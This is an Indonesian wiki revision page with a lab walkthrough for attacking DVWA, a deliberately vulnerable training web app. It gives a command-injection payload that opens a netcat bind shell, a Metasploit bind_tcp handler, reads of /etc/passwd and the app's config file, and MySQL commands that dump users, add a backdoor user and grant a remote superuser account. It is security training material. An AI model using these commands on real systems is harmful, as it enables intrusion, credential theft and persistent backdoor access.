Difference between revisions of "DVWA: Exploit menggunakan Metasploit"

From OnnoWiki
Jump to navigation Jump to search
Line 14: Line 14:
 
  DVWA Security > Security Level Low > Submit
 
  DVWA Security > Security Level Low > Submit
  
 +
 +
==Siapkan NetCat==
 +
 +
Masuk ke DVWA Command Injection, lakukan
 +
 +
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 +
 +
Dimana 192.168.0.100 adalah IP address server DVWA
  
 
==Gunakan metasploit==
 
==Gunakan metasploit==

Revision as of 03:54, 4 May 2017

Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Persiapan

Masuk ke DVWA, misalnya

http://192.168.0.80/DVWA-1.9
username admin
password password

Klik

DVWA Security > Security Level Low > Submit


Siapkan NetCat

Masuk ke DVWA Command Injection, lakukan

192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dimana 192.168.0.100 adalah IP address server DVWA

Gunakan metasploit

Jalankan

msfconsole thankyou

Lakukan


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit

Cek password

whoami
grep apache /etc/passwd
grep apache /etc/group


Cek Password melalui konfigurasi Web

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Cari password database

ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

Explorasi database


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Buat user baru

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Lihat informasi tabel MySQL


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD

Buat user MySQL yang baru

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD

Referensi